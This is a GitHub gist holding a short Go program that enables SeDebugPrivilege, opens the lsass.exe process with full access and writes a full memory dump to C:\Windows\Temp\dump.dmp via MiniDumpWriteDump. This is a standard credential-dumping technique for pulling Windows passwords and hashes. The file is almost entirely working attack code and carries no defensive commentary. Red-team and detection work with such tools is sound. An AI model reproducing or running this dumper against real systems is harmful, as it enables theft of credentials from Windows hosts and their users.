Created
July 9, 2021 11:16
-
-
Save pwn1sher/9002adac9eb40a1bc6a8af8cdddeef19 to your computer and use it in GitHub Desktop.
Revisions
-
pwn1sher created this gist
Jul 9, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,108 @@ package main import ( "flag" "fmt" "golang.org/x/sys/windows" "log" "syscall" ) const ( PROCESS_CREATE_PROCESS = 0x0080 PROCESS_CREATE_THREAD = 0x0002 PROCESS_DUP_HANDLE = 0x0040 PROCESS_QUERY_INFORMATION = 0x0400 PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 PROCESS_SET_INFORMATION = 0x0200 PROCESS_SET_QUOTA = 0x0100 PROCESS_SUSPEND_RESUME = 0x0800 PROCESS_TERMINATE = 0x0001 PROCESS_VM_OPERATION = 0x0008 PROCESS_VM_READ = 0x0010 PROCESS_VM_WRITE = 0x0020 GENERIC_WRITE = 0x40000000 FILE_SHARE_WRITE = 0x00000002 CREATE_ALWAYS = 0x2 FILE_ATTRIBUTE_NORMAL = 0x80 DEBUG_WITH_FULL_MEMORY = 0x00000002 PROCESS_ALL_ACCESS = (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SET_INFORMATION | PROCESS_SET_QUOTA | PROCESS_SUSPEND_RESUME | PROCESS_TERMINATE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) ) func EnablePrivilege(name string) error { // get current process token handle := windows.CurrentProcess() var token windows.Token err := windows.OpenProcessToken(handle, windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token) if err != nil { fmt.Println("Failed to obtain current process token\n") } // lookup debug privilege debug := new(windows.LUID) err = windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(name), debug) if err != nil { fmt.Println("Failed to lookup \"%s\"\n", name) } // adjust token privilege privilege := windows.Tokenprivileges{ PrivilegeCount: 1, Privileges: [1]windows.LUIDAndAttributes{{ Luid: *debug, Attributes: windows.SE_PRIVILEGE_ENABLED, }}, } err = windows.AdjustTokenPrivileges(token, false, &privilege, 0, nil, nil) if err != nil { fmt.Println("Failed to enable %s with current process token\n", name) } return nil } func main() { // Enable Debug Privs ! EnablePrivilege("SeDebugPrivilege") pid := flag.Int("pid", 0, "Process ID of lsass.exe") flag.Parse() dbghelp := windows.NewLazySystemDLL("Dbghelp.dll") MiniDumpWriteDump := dbghelp.NewProc("MiniDumpWriteDump") var sa windows.SecurityAttributes //get handle to process pHandle, errOpenProcess := windows.OpenProcess(PROCESS_ALL_ACCESS, false, uint32(*pid)) if errOpenProcess != nil { log.Fatal(fmt.Sprintf("[!] Error calling OpenProcess: %s\n", errOpenProcess.Error())) } fmt.Println(fmt.Sprintf("[-] Successfully got a handle to process %d", *pid)) //create dump file path := "C:\\Windows\\Temp\\dump.dmp" fHandle, errCreateFile := windows.CreateFile(syscall.StringToUTF16Ptr(path), GENERIC_WRITE, FILE_SHARE_WRITE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0) if errCreateFile != nil { log.Fatal(fmt.Sprintf("[!] Error calling CreateFile\n")) } fmt.Println(fmt.Sprintf("[-] Successfully got a handle to file %d", fHandle)) PID := uintptr(*pid) //dump memory with minidumpwritedump success, _, _ := MiniDumpWriteDump.Call(uintptr(pHandle), PID, uintptr(fHandle), DEBUG_WITH_FULL_MEMORY, 0, 0, 0) //if errMiniDump != nil { if success == 0 { log.Fatal(fmt.Sprintf("[!] Error calling MiniDumpWriteDump:\n")) } fmt.Println(fmt.Sprintf("[-] Dump Completed: %s", path)) //close handle to process windows.CloseHandle(pHandle) }